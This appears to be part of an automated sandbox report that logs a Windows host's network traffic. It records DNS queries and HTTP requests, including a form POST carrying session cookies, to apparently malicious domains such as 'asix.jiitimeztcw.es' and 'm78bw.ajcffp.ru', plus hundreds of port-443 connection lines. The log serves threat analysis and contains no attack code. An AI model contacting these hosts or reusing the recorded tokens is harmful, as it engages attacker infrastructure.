              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /ij9B1srBpWG7PktmXozMpAfjAkXX9fqf4mnIUavaF4cJBACQ12RVF2ht1Sw1U4ef208 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /qrS5DHMtUFf3KT9q8ukN4yHvZJtYoxvAk1stcbB3pNrz0Hq2DA5aIDTTrAw3yMylkGVojua19Ref240 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: GET /uvAvGkzUPzYsrtIeQrJV34vxwRhrm3BqumnX33aAUDQoDsHJYfhlRDVlUqepnfFM0vJef260 HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IitOc3FVb1VzWFhnVzFaNzIrSFo3Y2c9PSIsInZhbHVlIjoia2hQeGRiTGQ0RHNMM2FDNU5pR2RTZ0dBV29HbDRqOTBrTjFycWExQ1R3dU5SRTE1VCtwbjNaMWE1Si96S0VvQzZxaXJCNDFnY3JoUXI5bXhxN1c5RHk2dU40L0ljdWl3TUpFREF0ak5rZlJNSEltSUlIaDExcjdTWmhiMVFaQkQiLCJtYWMiOiJmNGM3MzFmODgzMzdmMmIxNjMwZDI2N2YyMzcyNWY0MzBhYTUxOTUxNGY4OWQxZTU0ZWM1NzY5ZGFjN2MyYzFhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikc5SlBxVElKdmZRMm11UUJPc1J2UFE9PSIsInZhbHVlIjoielJ4RG5POWhyS1VsR3J1M3h0R1NRREJGWkRYbWZRWW4yYkNTY2FXc1czME8xSWF4Q0c3NzlUMzNNMjdLL3JVTmJDR3MxOGNuZnQ1ekVITjlGcG1IbGJLeDVGMmZ1OHJ1dTVOd1FadzU0ZmtvdHZhcnVVZmJFMFN5YUkwdGRyUWIiLCJtYWMiOiIxZTc4MjA2YWUzZGNhYmZlMWRiMTUxYmY1NDM1OTYzZTk0NThlNzBiMzQ4MTRjMDNmMjQzNmZjMWRmNzliMjI3IiwidGFnIjoiIn0%3D
              Source: global trafficDNS traffic detected: DNS query: asix.jiitimeztcw.es
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: m78bw.ajcffp.ru
              Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: github.com
              Source: global trafficDNS traffic detected: DNS query: ok4static.oktacdn.com
              Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
              Source: unknownHTTP traffic detected: POST /gq51aG9xh8pi82PuT2fP1C9fcAdPeoZJ7m HTTP/1.1Host: asix.jiitimeztcw.esConnection: keep-aliveContent-Length: 775sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryehCdtyq7IALQ33wLsec-ch-ua-mobile: ?0Accept: */*Origin: https://asix.jiitimeztcw.esSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://asix.jiitimeztcw.es/ERcPqD/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Iml5RWI4M0NrTUxOOE12N3c4Uk42Tmc9PSIsInZhbHVlIjoieS9YSGg3Y1l1Q0FYYkNVL1U2ZkphNUtDN3B2YU4xYW9YN2pYazJLdVJHTm11ekc1WkxVaFVVN3NSNGpzSEtlU2tiQitONlFtUXRKMHpibThKTUtRaHEwV3dlVm56dGl2WDFZWEZ6bkliZWR1eUdaZ0RjWWpZR1A1ZGp6Nk1uV0IiLCJtYWMiOiJjMmYyNzBhYzE5M2Y3ZDkwNTBhZGJlNmRkZDU3ZGU0OTY0ODRlYTU5NTZhNWZhMTFkODEwZGFmMjdiYTlmZTZiIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InR5c3YwOElNQUVZK0dJWENFdll2dVE9PSIsInZhbHVlIjoiZjNUYWprelRRc3NuMWJCcHd0SnBaMEg1M0V1c2lvZDNMYnBIVVMxaDhBenlMMENHSjFNd29hOXpkVnQrSEtJU2t6V045cVZpMlpTcTYyUVN2emRGSGpFYU95SDYwMk9EQXJoOFZrcHpXQVVkTVYvbEdyQUdUZnRoL2RsS1NiVDgiLCJtYWMiOiI0NDk5MDUyZGQyNDI5NjgyOTM0MjBhNWY1Yzg0Y2VkYjg2YjhhMjcwMjMxMjcxODk3MTgzNTAwNTdkMjk5MWUxIiwidGFnIjoiIn0%3D
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 18:35:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OxKOmvt4lEVM8UruftbcAZgiwJ6deAOGHjwIk6PbHh1peAxM2vw4kpLkg3F2WiQEVayK6%2FAI%2BIo6ITXSMqZvc2XdvlkVx52KdG2PNDyOlMpFb0UhlyyjXO%2FDXZmh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=42978&min_rtt=42976&rtt_var=16120&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2048&delivery_rate=66244&cwnd=61&unsent_bytes=0&cid=20ab3eb852bd91e2&ts=243&x=0"Server: cloudflareCF-RAY: 9258449dd93d80d0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=107080&min_rtt=106354&rtt_var=23530&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1712&delivery_rate=34316&cwnd=211&unsent_bytes=0&cid=055dafcd3ad2bc40&ts=676&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 18:35:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hboiZRtlTBWHnMzLS0SLkzDTTQEReWL0LbTQdX8qi6kL3yAhLqA30UiAr4sCFcRvGkrOxAVldEkVaF41diVBvDqSeVEKxF1bXPCL6wJFlRQlC5%2FmFpmuOksKBoPq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingserver-timing: cfL4;desc="?proto=TCP&rtt=40097&min_rtt=39913&rtt_var=15099&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2238&delivery_rate=71355&cwnd=146&unsent_bytes=0&cid=9ee10f2939905f20&ts=418&x=0"Cache-Control: max-age=14400CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 925844a2ad804314-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103488&min_rtt=102761&rtt_var=22774&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1903&delivery_rate=35488&cwnd=236&unsent_bytes=0&cid=094fd0e4a1ee9d64&ts=795&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 18:35:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CmOgWG%2BG64dszSolZT331LgpB0GiAZVP03kUshzi63JrNXK%2BQv%2FjgJBWZvVVT332VPcxwsgR8JpEaaEar2kFHL3saRslubWqTM73CKTx72eSpPd%2FG5kkMUjlm6Js"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=9956&min_rtt=9951&rtt_var=3743&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2066&delivery_rate=284913&cwnd=241&unsent_bytes=0&cid=4953ee249a55da9d&ts=329&x=0"Server: cloudflareCF-RAY: 925844a76dd86da2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=105456&min_rtt=104918&rtt_var=22976&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1730&delivery_rate=34903&cwnd=252&unsent_bytes=0&cid=4b74c6d3b3533468&ts=688&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Mar 2025 18:35:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DVRpnC7NhHevYrDeikWGIVVKJZ29gylx%2B8QbNF%2F9lgR7uHbyHsKCno8Z9XasKPn8KVn3RlLK7xKcRz7drjjEFk40p78TSguBTyzvXirzbmW2FDZIVvSnCcOkbj0k"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=40475&min_rtt=40189&rtt_var=11557&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2067&delivery_rate=70851&cwnd=92&unsent_bytes=0&cid=f660862440208ea8&ts=232&x=0"Server: cloudflareCF-RAY: 925844bcbac9f02b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=107144&min_rtt=106444&rtt_var=23508&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1731&delivery_rate=34310&cwnd=232&unsent_bytes=0&cid=1892c2ff1e0fb8c6&ts=615&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
